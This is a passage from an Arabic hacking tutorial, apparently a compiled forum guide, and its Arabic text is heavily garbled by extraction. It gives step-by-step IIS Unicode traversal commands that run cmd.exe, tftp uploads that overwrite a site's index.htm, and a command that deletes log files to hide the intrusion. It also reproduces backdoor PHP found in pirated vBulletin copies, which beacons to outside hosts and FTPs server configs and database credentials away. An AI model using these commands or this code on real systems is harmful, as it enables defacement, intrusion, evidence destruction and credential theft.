‫ﺑﻌ ﺾاﻟﻨﺎس ﯾﺴﺄﻟﻮن ﻣﺎﻟﺬي ﯾﻈﻬ ﺮاو ﻋﻠﻰاي ﺷﻜ ﻞ ﯾﻈﻬ ﺮ‬
‫ﺎﻟ ﺤ ﻞﺑﺴﯿﻂ‬
‫ﺘﻈﻬ ﺮﻟﻚاﻟﻤﻠﻔﺎ ت‬ ‫ﺘﻪﻓﻲ ﻧﺎﻓﺬةاﻟﺪوس ﺳ‬ ‫ﺘﺎﺑ‬
‫‪Dir‬ﻫﺬااﻻﻣ ﺮﻟﻮﻗﻤ ﺖﺑﻜ‬
‫ﺘﺼﻔﺢﺗﻘ ﺮﯾﺒﺎ‬ ‫ﻮ ﻃ ﺮﯾﻘﺔ ﻇﻬﻮر ﺎﻟﻤﻠﻔﺎ تﻓﻲاﻟﻤ‬
‫ﺑﻨﻔ ﺲ ﻃ ﺮﯾﻘﺔاﻟﺪوس‬
‫ﺘﺒﺪأﻓﻲﺗﻨﻔﯿﺬاﻟﺨﻄﻮةاﻟﺜﺎﻧﯿﺔ‬ ‫ﺈذا ﻧﺠ ﺤ ﺖﻓﻲﺗﻨﻔﯿﺬاﻟﺜﻐ ﺮة ﻮاﻇﻬ ﺮ تاﻟﻤﻠﻔﺎ تاﻣﺎﻣﻚﻓ‬
‫ﺎﻟﺨﻄﻮةاﻟﺜﺎﻧﯿﺔ ﻋﻤ ﻞاﺑﻠﻮدﻟﻠﻤﻠ ﻒاﻟﺬيﺗ ﺮﯾﺪﺗ ﺤﻤﯿﻠﻪ‬
‫ﺘﺎجاﻟﻰ ﺧﺒ ﺮة‬ ‫ً ﻻﯾ ﺤ‬
‫ﻮﻋﻤ ﻞاﻷﺑﻠﻮدأﯾ ﻀﺎ‬
‫ﻟﻜﻦ ﻫﻨﺎﻟﻚ ﺷ ﺮوطﻟﻜﻲﺗﻌﻤ ﻞاﺑﻠﻮد‬
‫ﻗﻊاﻟ ﻀ ﺤﯿﺔ‬‫ﺘﻲإ فﺗﻲﺑﻲ ﻣﺜﺒ ﺖ ﻋﻠﻰاﻟﻤﻮ‬ ‫ﺘﺄﻛﺪ ﻣﻦأناﻟ‬ ‫ﯾﺠﺐاﻟ‬
‫ﺘﺄﻛﺪإﺗﺒﻊاﻻﺗﻲ‬ ‫ﻮﻟﻠﻜﻲﺗ‬
‫ﺘﻲ ﻧﺠ ﺤ ﺖﻓﻲ‬
‫ﺘﻢ‪ ٣٢‬وﻟﻜﻲﺗﺪ ﺧﻠﻪ ﯾﺠﺐأنﺗ ﻀﯿ ﻒﺑﻌ ﺾاﻟﻜﻠﻤﺎ ت ﻋﻠﻰاﻟﺜﻐ ﺮةاﻟ‬ ‫ﯾﺠﺐاﻟﺪ ﺧﻮ ل ﻋﻠﻰ ﻣﻠ ﻒاﻟﺴﺴ‬
‫ﺗﻨﻔﯿﺬﻫﺎ‬
‫ﻣﺜﺎ ل‪:‬‬
‫‪../winnt/system32/cmd.exe?/c+dir+c:\ http://www.xxxxxx.com/scripts/..Á‬‬

‫ﻗﻊاﻟﻤﻄﻠﻮب ورأﯾ ﺖ ﺎﻟﻤﻠﻔﺎ ت‬ ‫ﻫﺬهاﻟﺜﻐ ﺮة ﻋﻤﻠ ﺖﻓﻲاﻟﻤﻮ‬


‫ﺘﻐﯿ ﺮ‬‫ﻻ ﺣﻆاﻟ‬
‫‪http://www.xxxxxx.com/scripts/..Á‬‬
‫\‪../winnt/system32/cmd.exe?/c+dir+c:\Winnt\Sytem32‬‬
‫ﺘﻮاﺟﺪة دا ﺧ ﻞاﻟﻮﯾﻨﺪوز \‪Winnt\Sytem32‬‬ ‫ﻣﺎو ﺿﻊ ﻋﻠﻰاﻟﺜﻐ ﺮة ﻫﻮأﺳﻤﺎ ءﻟﻤﻠﻔﺎ ت ﻣ‬
‫ﺘﺄﻛﺪ‬ ‫ﺄي ﯾﺠﺐ ﻋﻠﯿﻚاﻟﺪ ﺧﻮ ل ﻋﻠﻰ ﻫﺬه ﺎﻟﻤﻠﻔﺎ تﻟﻜﻲﺗ‬
‫ﺘﻄﺎﺑﻘﺔ ﻣﻊ ﻫﺬهاﻟﺜﻐ ﺮة وﻟﻜﻦ ﻫﺬاﻟﯿ ﺲ ﺷ ﺮط‬‫ﺘﺨﺪﻣﻬﺎﻟﯿﺴ ﺖ ﻣ‬ ‫ﺘﻲ ﻧﺴ‬ ‫ﺘﺴﺎﻟﻮن ‪.....‬اﻟﺜﻐ ﺮةاﻟ‬ ‫ﺑﻌ ﺾاﻟﻘ ﺮا ء ﯾ‬
‫ﺘﻢ‬‫ﺘﻄﺎﺑﻘﻬﺎ ﯾﺠﺐ ﻋﻠﯿﻚاﻟﺪ ﺧﻮ لﺑﺎيﻛﺎن ﻋﻠﻰ ﻣﻠﻠ ﻒاﻟﺴﺴ‬ ‫ﻟﻠ‬
‫ﺘﻐﻠ ﺖ ﻣﻌﺎه ﻫﺬهاﻟﺜﻐ ﺮة‬ ‫ﻣﻤﻜﻦ ﯾﻜﻮنا ﺣﺪاﻟﻘ ﺮا ءاﺷ‬
‫\‪http://www.xxxxx.com/scripts/..ü€€€....exe?/c+dir+c:‬‬
‫ﺘﻢ‬‫ﻮﯾﻘﻮ لﻛﯿ ﻒاد ﺧ ﻞ ﻋﻠﻰ ﻣﻠ ﻒاﻟﺴﺴ‬
‫ﺘﻢ‪٣٢‬‬ ‫ﺎﻟ ﺤ ﻞ ﻫﻮ وا ﺣﺪ ﯾﺠﺐ ﻋﻠﯿﻚإ ﺿﺎﻓﺔاﺳﻤﺎ ءاﻟﻤﻠﻔﺎ تﻟﻜﻲﺗﺪ ﺧ ﻞ ﻋﻠﻰاﻟﺴﺴ‬
‫ﺘﺪاد‬‫ﺎيﺑﻌﺪ ﻫﺬااﻻﻣ‬
‫\‪c+dir+c:‬ﻫﻨﺎﺗ ﻀﯿ ﻒأﺳﻤﺎ ء ﺎﻟﻤﻠﻔﺎ ت‬
‫‪http://www.xxxxx.com/scripts/..ü€€€...Winnt/System32/‬‬
‫ﺘﺎجاﻟﻰ ﺧﺒ ﺮة‬ ‫َ ﻻﺗ ﺤ‬
‫ﻛﻤﺎﻗﻠﻨﺎ ﺳﺎﺑﻘﺎ‬
‫ﺘﻮﯾﺎﺗﻪ‬‫ﺘﻈﻬ ﺮﻟﻚ ﻣ ﺤ‬ ‫ﺘﻢ ﺳ‬‫ﻮﺑﻌﺪ د ﺧﻮ ل ﻣﻠ ﻒاﻟﺴﺴ‬
‫ﻮﯾﺠﺐ ﻋﻠﻰ آﻧﺬاكاﻟﺒ ﺤﺚ ﻋﻦﺑ ﺮﻧﺎﻣ ﺞ ﯾﺴﻤﻲ‬
‫ﺘﺄﻛﺪ ﻣﻦاﻧﻪﻓﻲاﻟﺠﻬﺎز‬ ‫‪tftp.exe‬ﯾﻌﻨﻲ دور ﻋﻠﻰ ﻫﺬااﻟﺒ ﺮﻧﺎﻣ ﺞاﻟﯿﻦ ﻣﺎﺗﻠﻘﺎه وﺗ‬
‫ﺘﺒ ﺮ ﺷ ﺮطﻟﻜﻲﺗﻌﻤ ﻞاﺑﻠﻮدﻟﻠﺼﻔ ﺤﺔ‬ ‫ﻻن ﻫﺬااﻟﺒ ﺮﻧﺎﻣ ﺞ ﯾﻌ‬
‫وﻟﻮﻟﻘﯿ ﺖاﻟﺒ ﺮﻧﺎﻣ ﺞاﺗﻔﺎ ء لﺑﺎﻟﺨﯿ ﺮ ﯾﻌﻨﻲﺑﺈذنا ﷲﺗﻌﺒﻚ ﻣﺎﻫﻮ راﯾﺢ ﻋﻠﻰ ﺎﻟﻔﺎ ﺿﻲ‬

‫‪٧٦‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪.........................................................................................‬‬
‫ﻮاﻟﺸ ﺮطاﻟﺜﺎﻧﻲ ﻫﻮ‬
‫ﺘﻲإ فﺗﻲﺑﻲ‬ ‫ﯾﺠﺐأن ﯾﻜﻮن ﻋﻨﺪكﺑ ﺮﻧﺎﻣ ﺞاﻟ‬
‫ﻮﻫﺬااﻟﺒ ﺮﻧﺎﻣ ﺞﺗﻘﺪرﺗﻨﺰﻟﻪ ﻣﻦﻫﺬااﻟﻌﻨﻮان‬
‫‪www.geocities.com/anorR1234/tftpd32.zip‬‬
‫ـ‬‫\‪C:‬ﻮﺑﻌﺪ ﻣﺎﺗﻨﺰ ل ﺎﻟﺒ ﺮﻧﺎﻣ ﺞ وﺗﻔﻚاﻟ ﻀﻐﻂ ﻣﻨﻪ ﻣﻦاﻻﻓ ﻀ ﻞإﻧﻚﺗ ﺤﻄﻪ دا ﺧ ﻞاﻟ‬
‫ﺘﻲﺗ ﺮﯾﺪأنﺗﻌﻤ ﻞﻟﻬﺎأﺑﻠﻮدﻓﻲاﻟﺴﻲ‬ ‫ﻮﺗ ﺤﻂأﯾ ﻀﺎاﻟﺒ ﺮاﻣ ﺞأو ﺎﻟﺼﻔ ﺤﺔاﻟ‬
‫ﻗﻊ‬ ‫ﺗ ﺤﻄﻪﻓﻲاﻟﺴﻲاﻟﻰ دا ﺧ ﻞ ﺟﻬﺎزك ﻣﻮ ﺎﻟﻰ داﻟﺨ ﻞاﻟﻤﻮ‬
‫ﻮﺗﺸﻐ ﻞاﻟﺒ ﺮﻧﺎﻣ ﺞ‬
‫ﺘﻚاﻷﺳﺎﺳﯿﺔ‬ ‫ﺘﻬﻰ ﻣﻦ ﻣﻬﻤ‬ ‫ﺘ ﺮﻛﻪ ﯾﻌﻤ ﻞاﻟﻰأنﺗﻨ‬ ‫‪tftp32.exe‬ﻮﺗ‬
‫\‪C:‬ﺄﺳﻤﻊﻛﻼﻣﻲ و ﺣﻂﻛ ﻞ ﺷﻲﻓﻲ‬
‫ﺘﻬﺎﺑﺈذنا ﷲ را حﺗﻨﺠﺢاﻟﻤﻬﻤﻪ‬ ‫ﻷﻧﻚﻟﻮ ﺣﻄﯿ‬
‫‪-----------------------------------------------------------------‬‬
‫ﺎﻻنﺑﺪأﻧﺎﻓﻲاﻟﻨﻘﻄﺔاﻟﺨﻄ ﺮة وﻫﻲﺗ ﺤﻤﯿ ﻞاﻟﻤﻠﻔﺎ ت‬
‫ﺘ ﺤﻤﯿ ﻞاﻻﺑﻠﻮد‬ ‫ﻗﺼﺪﺑﺎﻟ‬ ‫ﻣﻊاﻟﻌﻠﻢأﻧﻲا‬
‫ﺄي‬
‫ﺄﺑﻠﻮد =ﺗ ﺤﻤﯿ ﻞ‬
‫ﻣﻮﺗﺠﻤﯿ ﻞ‬
‫ﺘﻘﺪأﻧﻜﻢ را حﺗﻔﻬﻤﻮ‬ ‫ﺘﻔﺎﺋ ﻞﺑﺎﻟﺨﯿ ﺮﻷﻧﻲ ﻣﻌ‬ ‫ًﺑ ﺲﺄﻧﺎ ﻣ‬ ‫ﻮﺗ ﺤﻤﯿ ﻞاﻟﻤﻠﻔﺎ ت ﻃ ﺮﯾﻘﺔ ﻣﻌﻘﺪة ﻧﺴﺒﯿﺎ‬
‫ﺎﻟﻤﻬﻢ ﻧ ﺮﺟﻊﻟﻤﻮ ﺿﻮﻋﻨﺎ‬
‫ﺘﺼﻔﺢ‬ ‫ًاﻟﻰاﻟﻤ‬ ‫ﺎﻟﻤﻬﻢ ﻃ ﺮﯾﻘﺔ ﻧﺴ ﺦاﻟﻤﻠﻔﺎ تﺗ ﻀﺎ فاﯾ ﻀﺎ‬
‫ﻮﺗ ﻀﺎ فﺑﻬﺬهاﻟﻄ ﺮﯾﻘﺔ‬
‫ﻣﺜﺎ ل ‪:‬‬
‫\‪http://www.xxxxx.com/scripts/..ü€€€....exe?/c+dir+c:‬‬
‫ﺘﻐﻠ ﺖ ﻣﻌﺎك‬ ‫ﺗﺨﯿ ﻞ ﺎﻟﺜﻐ ﺮةﻫﺬهاﺷ‬
‫ﻮﯾﺠﺐ ﻋﻠﯿﻚإﻧﻚﺗﻤﺴﺢﺑﻌ ﺾاﻹ ﺿﺎﻓﺎ ت ﻣﻦاﻟﺜﻐ ﺮةﻟﻜﻲﺗ ﻀﯿ ﻒ ﺎﻣ ﺮاﻟﻨﺴ ﺦ‬
‫‪/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm‬‬
‫ﯾﻌﻨﻲ ﺎﻟﻰ را ح ﻧﻤﺴ ﺤﻪ ﻣﻦاﻟﺜﻐ ﺮةﺑﯿﻜﻮن ﻫﺬهاﻻ ﺿﺎﻓﺔ‬
‫\‪/c+dir+c:‬‬
‫ﻋﺸﺎنﺗﻈﯿ ﻒﺑﺪاﻟﻬﺎ‬
‫‪/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm‬‬
‫ﻮﻟﻤﻦ ﻧﻈﯿ ﻒاﻣ ﺮاﻟﻨﺴ ﺦﺑﯿﻄﻠﻊﻟﻨﺎﺑﻬﺬااﻟﻄ ﺮﯾﻘﺔ‬
‫‪"-http://www.xxxxx.com/scripts/..ü€€€...xe?/c+tftp.exe+‬‬
‫‪i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm‬‬
‫ﺷﺎﯾﻔﯿﻦ ﯾﺎﺷﺒﺎبإ شاﻟﻰاﺗﻐﯿ ﺮ‬
‫ًإﻧﻚﺗﻐﯿ ﺮاﻟﻼزمﻓﻲأﻣ ﺮاﻟﻨﺴ ﺦ‬ ‫ﺑ ﺲ ﻻزمأﯾ ﻀﺎ‬
‫ﻣﺜ ﻞ‬
‫ﺘﻲا فﺗﻲﺑﻲاﻟﻰ ﺣﺎ ﻃﻪﻓﻲ ﺎﻟﺴﻲ وﻣﺸﻐﻠﻪاﻻن‬ ‫‪tftp.exe‬ﻫﺬا ﺳﯿﺒﻪﻓﻲ ﺣﺎﻟﻪ ﻻﻧﻪاﺳﻢﺑ ﺮﻧﺎﻣ ﺞاﻟ‬
‫"‪"-i‬ﻫﺬاﺑ ﺮ ﺿﻪ ﺳﯿﺒﻪ ﻻﻧﻪ ﻣﻬﻢ‬
‫ﺘﻲا فﺗﻲﺑﻲ‬ ‫ﺘﺄﻛﺪ ﻣﻦاﻻﯾﺒﻲﻟﻤﻦﺗﺸﻐﺐاﻟ‬ ‫ﺘﺐاﻻﯾﺒﻲﺗﺒﻊ ﺟﻬﺎزك وﻋﺸﺎنﺗ‬ ‫ﻗﺎمﻫﺬاﺗﻜ‬ ‫‪1.1.1.1‬ﻫﻨﺎﺑﺪا لاﻻر‬
‫ﺘﺒﻪ‬ ‫را ح ﯾﻄﻠﻊ ﺎﯾﺒﻲ وﻫﺬااﻻﯾﺒﻲاﻟﻰ ﻃﻠﻌﻠﻚ ﻫﻮاﻟﻰﺗﻜ‬
‫ﺘﺒ ﺮ ﺷ ﺮطﻓﻲ ﻧﺴ ﺦاﻟﻤﻔﺎ ت‬ ‫‪GET‬ﻫﺬهاﻻ ﺿﺎﻓﺔ ﺳﯿﺒﻬﺎﻓﻲ ﺣﺎﻟﻬﺎ ﻻﻧﻬﺎﺗﻌ‬

‫‪٧٧‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘ ﺤﻤ ﻞ وﻣﻤﻜﻦﺗﻐﯿ ﺮﻫﺎ ﻋﺎدﺑﻜﯿﻔﻚاﻧ ﺖ‬ ‫‪index.htm‬ﻫﺬهاﺳﻢاﻟﺼﻔ ﺤﺔاﻟﻰ را حﺗ‬


‫ﻗﻊ‬ ‫\‪C:\inetpub\wwwroot‬ﻮﻫﺬا ﻣﻜﺎنﺗﻮاﺟﺪاﻟﺼﻔ ﺤﺔاﻟ ﺮﺋﯿﺴﺔاﻟﺨﺎﺻﺔﺑﺎﻟﻤﻮ‬
‫ﻗﻊ‬ ‫ﺘﻲﺗ ﺮﯾﺪهأن ﯾﻈﻬ ﺮﻓﻲاﻟﻤﻮ‬ ‫ﺘﺐإﺳﻢاﻟﺼﻔ ﺤﺔاواﻟﻤﻠ ﻒاﻟ‬ ‫‪index.htm‬ﻫﻨﺎﺗﻜ‬
‫ـ‬
‫ﺘﺄﻛﺪ ﻣﻦإﻧﻚ ﺣﺎطاﻟﺼﻔ ﺤﺔاﻟﻤ ﺮادﺗ ﺤﻤﯿﻠﻬﺎﻓﻲ ﺟﻬﺎزك دا ﺧ ﻞاﻟ‬ ‫\‪C:‬ﯾﺠﺐاﻟ‬
‫‪index.htm‬ﻮﻣﺜﻼاﺳﻢاﻟﺼﻔ ﺤﺔ‬
‫ﺘ ﺮ ﻋﺸﺎنﺗﻨﺴ ﺦاﻟﻤﻠ ﻒﺗﺎﻛﺪ ﻣﻦان ﺎﻟﺜﻐ ﺮةاﻻن ﺻﺎر ت ﻣﺸﺎﺑﻬﺎﻟﻤﺜ ﻞ ﻫﺬهاﻟﺜﻐ ﺮة‬ ‫ﻗﺒ ﻞ ﻣﺎﺗ ﻀﻐﻂاﻧ‬
‫‪"-http://www.xxxxx.com/scripts/..ü€€€...xe?/c+tftp.exe+‬‬
‫‪i"+212.212.212.212+GET+index.htm+C:\inetpub\wwwroot\index.htm‬‬
‫ﺘ ﺮ وﺗﻮﻛ ﻞ ﻋﻠﻰا ﷲ‬‫ﻮﻟﻮ ﻃﻠﻌ ﺖ ﻣﺸﺎﺑﻬﺎﻟﻬﺎا ﺿﻐﻂإﻧ‬
‫ﺘﻨﺴ ﺦاﻟﻤﻠ ﻒ‬ ‫ﻮﺑﺈذنا ﷲ را ح ﯾ‬
‫‪------------------------------------------------------------------------------------------------------‬‬
‫‪--------------------------------------------------------------------------------‬‬
‫ﻮﻓﻰاﻟﻨﻘﻄﺔاﻻ ﺧﯿ ﺮة واﻻﻫﻢ‬
‫ﻣﺴﺢ ﻣﻠﻔﺎ تﺗﻜﻮنﺗﺠﻤﻌ ﺖ دا ﺧ ﻞاﻟﺠﻬﺎز وﻣﻜﻮﻧﺔ ﻣﻌﻠﻮﻣﺎ ت ﻋﻨﻚ ﻣﺜ ﻞاﻻﯾﺒﻲ‬
‫‪http://server/msadc/..À ¯../..../ c+del+c:/*.log‬‬
‫‪--------------------------------------‬‬

‫** ************************************************************************************‬

‫ﺘﺸ ﺮهﻓﻲ ﺎﻟﻨ ﺖ ودوراﻟﻤﻌ ﺮﺑﯿﻦاﻟﻌ ﺮب و ﺣﻘﯿﻘﺔاﻟﻤﻮ ﺿﻮ ع وﺗﻌ ﺮﯾﺒﻬﻢ‬‫‪-٥‬اﻟﻨﺴﺨﻪاﻟﻤﻨ‬


‫^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^‬
‫ﺘﺨﺪم ﻧﺴﺨﻪ ﻧ ﻀﯿﻔﻪ‬ ‫ﻗﻌﻪ ‪١‬ﻻﻧﻪ ﯾﺴ‬‫ﺘﺪﯾﺎ ت ﺟﻮن رﻏﻢﺛﻐ ﺮا ت ﻣﻮ‬ ‫ﻗﻮا ﻣﻨ‬‫ﺘﺮ‬‫ﺎوﻻﻛﻤﺎﻗﻠﻨﺎﻟﻤﺎذا ﻻﯾﺨ‬

‫ﺘﺪي ﻻﻣﺎذا ﯾﻨﺸ ﺮوﻧﻪ ﺎذا‪$‬‬


‫‪-١‬اﻟﻨﺴﺨﻪاﻟﻤﻮﺟﻮدﺑﺎﻟﻨ ﺖ ﻣﻠﯿﺎنﺛﻐ ﺮا ت وﻋﺎرﻓﯿﻦ ﺟﯿﺪ ﻣﺼﻤ ﻤﻤﻲاﻟﻤﻨ‬
‫ﺘﺒﻠﯿﻎﻟﻦﺗﻬ ﺮب ﻣﻦﺛﻐ ﺮاﺗﻪﻟﻮﺗﺸﻐ ﻞ‬ ‫ﺘﺒﻠﯿﻎ ﻻﻛﻲﻟﻮ ﻧﻔﺬ ت وﻣﺴ ﺤ ﺖﻛﻮداﻟ‬‫ﺘﻮيﻛﻮداﻟ‬ ‫اﻟﻨﺴﺨﻪﺗﺠ ﺮﯾﺒﻲ وﻣ ﺤ‬
‫ﺘﻪﺑﻨﻔﺴﻚ‬ ‫ﻓﻜ ﺮكﻟﻜﺸﻔ‬

‫ﺘﻤﻮﻧﻲ‬
‫ﺘﻬﻢﺑﺪﻻانﺗﻜﻮنﻟﻤﺪة ‪٣٠‬ﯾﻮﻣﺎﻓﻬﻤ‬
‫ﺘ ﺮوﯾ ﺞﺑ ﻀﻌ‬
‫‪-٢‬اﻧﻪ ﺟﻤﯿﻌﻪ ﻧﺴﺨﻪﺗﺠ ﺮﯾﺒﻲﻟ‬

‫ﻗﻊ ﻫﻜ ﺮز ﺻﺢ وﯾﻨﻚاﻧ ﺖ ﻣﻦﻫﻜ ﺮزاﻟﻐ ﺮب‬


‫ﺘ ﺮﻧ ﺖ ﻫﻮ ﻧﺴﺨﻪ ﻧ ﺤﺼ ﻞ ﻋﻠﻲ ﻣﻦ ﻣﻮا‬‫ﺘﺸ ﺮهﺑﺎﻻﻧ‬‫‪-٣‬اﻟﻨﺴﺨﻪاﻻﻣﻨ‬
‫و ﺣﯿﻠﻬﻢ‬
‫ﺘﺸ ﺮهﻓﻲاﻟﻨ ﺖﻟ ﺮﺋﯿ ﺖ ﺻﺢﻗﺎﻣﻮاﺑ ﺤﺬ فﻛﻮد‬‫ﻟﻮﺗﻤﻜﻨ ﺖﻓﻲ ﺎﻟ ﺤﺼﻮ ل ﻋﻠﻲ ﻧﺴﺨﺔاﻟﺸ ﺮﻛﺔ ‪ %١٠٠‬وﻧﺴﺨﻪ ﻣﻨ‬
‫ﺛﻐ ﺮا ت‪-‬وﺑﻌﺪﯾﻦ ﯾﺠﻲاﻻ خ ﺻﺎ ﺣﺐاﻟﻨﺴﺨﻪ ﯾﻮﻛﺪاﻧﻪﻟﻘﻲﺛﻐ ﺮة‬
‫ﺘﺒﻠﯿﻎ ﻣﻨﻪﺑ ﻞا ﺿﺎﻓﻮااﻟﯿﻪﻛﻮداد وﺑﻼوي و‬ ‫اﻟ‬
‫ﺘﺪﯾﺎ ت ﺟﻮن‬
‫ﺑﻤﻨ‬
‫ﻗﻌﻪﻟﻜﺜ ﺮاﻟﺰوار‬
‫ﻗﻌﻪ وﺳﻌ ﺮاﻋﻼﻧﺎﺗﻪارﺗﻔﻊﻓﻲ ﻣﻮ‬ ‫ﻮاﻟﻌﺎﻟﻢ ﯾﻨﺪﻫ ﺶﻛﯿﯿﯿﯿﯿﯿ ﻒ ﺧﻼ صاﻧﺸﻬ ﺮ ﻣﻮ‬
‫ﺎﻟ ﺤﻘﯿﻘﺔ ﻫﻮ ﻧﻔﺴﻪا ﺿﺎ فاﻟﻜﻮد وﻧﻔﺴﻪ ﯾﻌ ﺮ ف ﻣﻜﺎﻧﻪ وﻛﯿﻔﺔاﻟﻌﺐﻓﯿﻪ وا ﷲﻫﻜﺬااﻻﻣﻮر‬

‫ﻗ ﻞ ﻧﺬﻻ ﻣﻦ ﺎﻻﺟﺎﻧﺐ‬
‫ﺎﻟﻤﻌ ﺮﺑﯿﻦاﻟﻌ ﺮبﻟﯿﺴﻮاا‬

‫ﺘﻌ ﺮﯾﺐ ﻧﺴﺨﻜﻢﺑﺎاﻧﻔﺴﻜﻢ‬


‫ﺎﻧﺼ ﺤﻜﻢﺑ‬

‫‪٧٨‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

‫اﻟﻤﺴ ﺮﺑﻪﻟﻨﺎ ﻣﻦا ﺧﻮاﻧﻨﺎاﻟﻌ ﺮب وﻛﺎن ﻫﺬااﻟﻜﻮد‬٢٫٢٫٥ ‫ﺘﺸﺎ فﺛﻐ ﺮهﻓﻲﺑﻌ ﺾ ﻧﺴ ﺦ‬


‫ﺘ ﺮهﺑﺴﯿﻄﻪﺗﻢاﻛ‬
‫ﻗﺒ ﻞﻓ‬
forum‫اﻟﻤﻮﺟﻮدﻓﯿﻬﺎﻓﻲ ﻣﻠ ﻒ‬

PHP:
--------------------------------------------------------------------------------
if ($action=="modify") {
$vbxh = h;
$vbxt = t;
$vbxp = p;
$vbxw = w;
$vbxa = a;
$vbx1 = 1;
$vbxr = r;
$vbxb = b;
$vbxn = n;
$vbxe = e;
$vbxo = o;
$vbxy =y;
$vbxl = l;
echo "<!-- ";
$file =
fopen("$vbxh$vbxt$vbxt$vbxp://$vbxw$vbxw$vbxw.$vbxa$vbxr$vbxa$
vbxb$vbx1.$vbxn$vbxe$vbxt/~$vbxr$vbxo$vbxy$vbxa$vbxl/.x.php?h=$
HTTP_HOST&h2=$SCRIPT_NA
ME", "r");
$rf = fread($file, 1000);
fclose($file);
echo " -->";
--------------------------------------------------------------------------------
‫ﻗﻊ‬ ‫ﺘﺼ ﻞﻓﻲ ﻣﻮ‬ ‫ﻮﻛﺎن ﺎﻟﻜﻮداﻟ ﺤﻠﻮ ﻫﺬا ﯾ‬
http://www .arab1.net/
http://www .arab1.net/~royal/.x.php?h=
$HTTP_HOST&h2=$SCRIPT_NAME
‫ﺘﺒﻠﯿﻎ ﯾﺎﻋﯿﻨﻲ ﻋﻠﯿﻬﻢ ﻋﺸﺎن ﯾ ﺤﻄﻮن‬‫ وﺳ ﺮﺑﻮﻫﺎﻟﻨﺎ ﺣﺒﺎﯾﺒﻨﺎ وﺷﺎﻟﻮاﻛﻮداﻟ‬٢٫٢٫٦ ‫ﻋﻤﻮﻣﺎ ﻣﻊاﻻﯾﺎم ﻧﺰﻟ ﺖ ﻧﺴﺨﻪ‬
‫ﻟﻨﺎﻛﻮدﺗﺠﺴ ﺲ وﻧﻌﻢاﻻ ﺧﻮهاﻟﻌ ﺮباﻟﻤﺴﻠﻤﯿﻦ‬
‫ﺑﺎﻻ ﺧﯿ ﺮ‬option ‫ﺑ ﺲﻫﺎﻟﻤ ﺮهاﻟﻜﻮداذﻛﻰ ﻮﻣﻬﻮ ﻣﻜﺸﻮ ف وﻏﺒﻲ زياﻻو لاﻟﻜﻮداﻟﻤ ﺮهﻫﺬيﻓﻲ ﻣﻠﻔﯿﻦ ﻣﻠ ﻒ‬
‫ﻣﻮﺟﻮد‬
PHP:
--------------------------------------------------------------------------------
echo "<!-- ";
include "$sqlupdate";

٧٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

echo " -->";

--------------------------------------------------------------------------------
functions‫ﻮﻣﻠ ﻒ‬
PHP:
--------------------------------------------------------------------------------
$sqlupdate =
base64_decode('aHR0cDovL3NhdWRpLm5vLWlwLmNvbS9+cm9
5YWwvLngyLmluYw==');
--------------------------------------------------------------------------------
‫ﺘﺼ ﻞاﻟﻜﻮد ﺎﻟ ﺤﻠﻮ ﻫﺬااﻟﻠﻲ‬ ‫ﯾﺎﻋﯿﻨﻲ ﻋﻠﻰاﻟﺬﻛﺎ ء ﺻ ﺮﻧﺎ ﻧﻌ ﺮ ف ﻧﻠﻌﺐﺑﺎﻛﺪوا دﯾﻜﻮد واﻧﻜﻮد ﻮاﻟﻤ ﺮهﻫﺬيﺑﻌﺪ ﯾ‬
. ‫ﻗﻊ ﻫﺬا‬‫ﺘﺨﺪﻣﯿﻦﻓﯿﻪ دﯾﻜﻮدﺑﺎﻟﻤﻮ‬ ‫ﻣﺴ‬
http://saudi.no-ip.com/
‫ﺘ ﺮ ﺣﯿﺐ‬‫ ﯾﺎﻋﯿﻨﻲ ﻋﺎﻟ‬WELCOME TO arab1.net‫ﺑﯿ ﺮ ﺣﺐﻓﯿﻜﻢ وﯾﻘﻮﻟﻜﻢ‬
‫ ﺎﻟﻠﻲﻓﯿﻬﺎﻛﻮد‬http://saudi.no-ip.com/~royal/.x2.inc ‫ﺘﺼ ﻞﺑﺎﻟﺼﻔ ﺤﻪﻫﺬي‬ ‫ﻋﻤﻮﻣﺎاﻟﻜﻮدﺑﯿ‬
‫اﻟﻠﻲ ﯾ ﺤﺴﺒﻮن ﻋﻠﯿﻨﺎﻛﻤﺴﻠﻤﯿﻦ وﻋ ﺮب‬....... ‫رﻫﯿﯿﯿﯿﯿﯿﺐ ﻮﯾﺒﯿﻦﻟﻨﺎ‬
‫ﺷﻮﻓﻮ ﺎﻟﻜﻮد‬

PHP:
--------------------------------------------------------------------------------
<div id="sHo" style="display:none;">
<!--
if you are seeing this code PlzZzZz Contact
[email]sleeping_bum@hotmail.com
<?php
system("mkdir /tmp/.statics");
system("cp /etc/httpd/conf/httpd.conf /tmp/.statics/httpd1.conf");
system("cp /usr/local/apache/conf/httpd.conf
/tmp/.statics/httpd2.conf");
system("cp admin/config.php /tmp/.statics/php.conf");
system("tar -cvf /tmp/.statics.tgz /tmp/.statics");
$vilename = "$SERVER_NAME.bz";
$port = base64_decode('aHB5NWk5');
$conn_id = ftp_connect("cyber-sa.virtualave.net");
$login_result = ftp_login($conn_id, "cyber-sa", "$port");
$upload = ftp_put($conn_id, "/tmp/$vilename", "/tmp/.statics.tgz",
FTP_BINARY);
ftp_quit($conn_id);
system("rm -rf /tmp/.statics.tgz");
system("rm -rf /tmp/.statics");
$base = "$HTTP_HOST&h2=$SCRIPT_NAME";
$open = "http://saudi.no-ip.com/~royal/.x2.php?h=$base";

٨٠
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫;)"‪$file = fopen("$open", "r‬‬


‫;)‪$rf = fread($file, 1000‬‬
‫;)‪fclose($file‬‬
‫>?‬
‫>‪--‬‬
‫>‪</div‬‬

